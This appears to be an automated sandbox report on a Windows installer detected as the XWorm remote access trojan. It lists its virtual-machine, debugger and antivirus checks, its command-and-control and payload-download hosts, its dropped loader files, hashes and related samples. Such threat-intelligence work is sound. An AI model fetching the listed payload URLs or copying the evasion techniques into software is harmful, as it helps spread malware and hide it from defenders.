Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\31__Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\31__Installer.exe	Memory allocated: 3030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Memory allocated: 31E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Memory allocated: 51E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe	Window / User API: threadDelayed 2118			Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Window / User API: threadDelayed 7723			Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe TID: 932	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe TID: 2444	Thread sleep count: 2118 > 30	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe TID: 2444	Thread sleep count: 7723 > 30	Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000002.3816556651.000000000097E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn?
Source: 31__Installer.exe, 00000000.00000002.3816556651.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000003.1678316988.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000003.1434298449.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 31__Installer.exe, 00000000.00000002.3816556651.000000000096C000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000003.1678316988.000000000096C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\31__Installer.exe	API call chain: ExitProcess graph end node			graph_0-26959
Source: C:\Users\user\Desktop\31__Installer.exe	API call chain: ExitProcess graph end node			graph_0-26774

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_003E65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_003E65D1

Source: C:\Users\user\Desktop\31__Installer.exe

0_2_003F40E4

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_02FA1628 mov eax, dword ptr fs:[00000030h]

0_2_02FA1628

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_003F7CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_003F7CB1

Source: C:\Users\user\Desktop\31__Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003E65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003E65D1
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003EA71E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003EA71E
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003EC71D SetUnhandledExceptionFilter,	0_2_003EC71D

Source: C:\Users\user\Desktop\31__Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: 31__Installer.exe, 00000000.00000002.3819907463.0000000003585000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_003E1671 cpuid

0_2_003E1671

Source: C:\Users\user\Desktop\31__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_003EF825
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: GetLocaleInfoA,	0_2_003F4859
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_003EF8E5
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_003EF94C
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_003EF988
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_003EDBBB
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_003EEC3A
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_003EF45D
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_003F44BA
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_003EF552
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_003F4594
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_003EF5F9
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_003EF654
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_003EEF28
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_003EDFDE
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_003E5FC5

Source: C:\Users\user\Desktop\31__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_003E41BA GetSystemTimeAsFileTime,__aulldiv,

0_2_003E41BA

Source: C:\Users\user\Desktop\31__Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\31__Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31__Installer.exe PID: 7148, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31__Installer.exe PID: 7148, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
31__Installer.exe	21%	ReversingLabs
31__Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://guanlix.cn:881/31.ccpG	0%	Avira URL Cloud	safe
156.238.235.31	0%	Avira URL Cloud	safe
http://guanlix.cn:881/31.ccp	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown
56.126.166.20.in-addr.arpa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
156.238.235.31	true	Avira URL Cloud: safe	unknown
http://guanlix.cn:881/31.ccp	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	31__Installer.exe, 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://guanlix.cn:881/31.ccpG	31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000002.3816556651.000000000097E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
156.238.235.31	unknown	Seychelles		394281	XHOSTSERVERUS	true
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466311
Start date and time:	2024-07-02 19:22:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	31__Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 28 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 31__Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:23:03	API Interceptor	8606058x Sleep call for process: 31__Installer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
156.238.235.31	31-o_Installer.exe	Get hash	malicious	XWorm	Browse
91.208.240.157	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/103.ccp
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/33.ccp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
guanlix.cn	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
XHOSTSERVERUS	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	156.238.235.31
	arm5-20240623-2204.elf	Get hash	malicious	Mirai	Browse	156.238.223.103
	H34bnq1S0l.elf	Get hash	malicious	Mirai	Browse	156.238.223.119
	armv6l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.238.223.141
	hmips-20240612-1156.elf	Get hash	malicious	Mirai	Browse	156.254.22.229
	skt.m68k.elf	Get hash	malicious	Mirai	Browse	156.238.223.104
	4JsnDtTGF3.exe	Get hash	malicious	LimeRAT	Browse	156.238.224.215
	bPOGt24Mub.elf	Get hash	malicious	Mirai	Browse	156.231.2.118
	9XzxoGb2mX.elf	Get hash	malicious	Mirai	Browse	156.254.22.242
	2BVJRatDwx.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.254.22.237
LUCID-AS-APLUCIDACLOUDLIMITEDHK	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Downloads\ind.jpg

Download File

Process:	C:\Users\user\Desktop\31__Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.605549717634749
Encrypted:	false
SSDEEP:	1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
MD5:	0773F13D8E171C40379FE891118B7379
SHA1:	ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
SHA-256:	115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
SHA-512:	8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
Reputation:	low
Preview:	.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.q.-.r.zd......6..".g..`.-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..\|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0..RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp

Download File

Process:	C:\Users\user\Desktop\31__Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.605549717634749
Encrypted:	false
SSDEEP:	1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
MD5:	0773F13D8E171C40379FE891118B7379
SHA1:	ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
SHA-256:	115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
SHA-512:	8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp, Author: unknown
Reputation:	low
Preview:	.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.q.-.r.zd......6..".g..`.-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..\|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0..RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..\|

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.938021095236715
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	31__Installer.exe
File size:	249'344 bytes
MD5:	cc1bb6a11aa1706bcbc42f04d1b1d865
SHA1:	b4555a73799aa255c431c227db3958e6286d6977
SHA256:	96d3ad9b885e0a57a37a84582d6a681f98d5e71b11e952082a7b610026198b00
SHA512:	13bd5158d2dbb7a6f621a4d36be93e897eee5cad20fbe8a6b16e45ae0d40f8051d697a3ea1d14510c2e4aad69160a74d83144838a4216dc814946d5c540acdbc
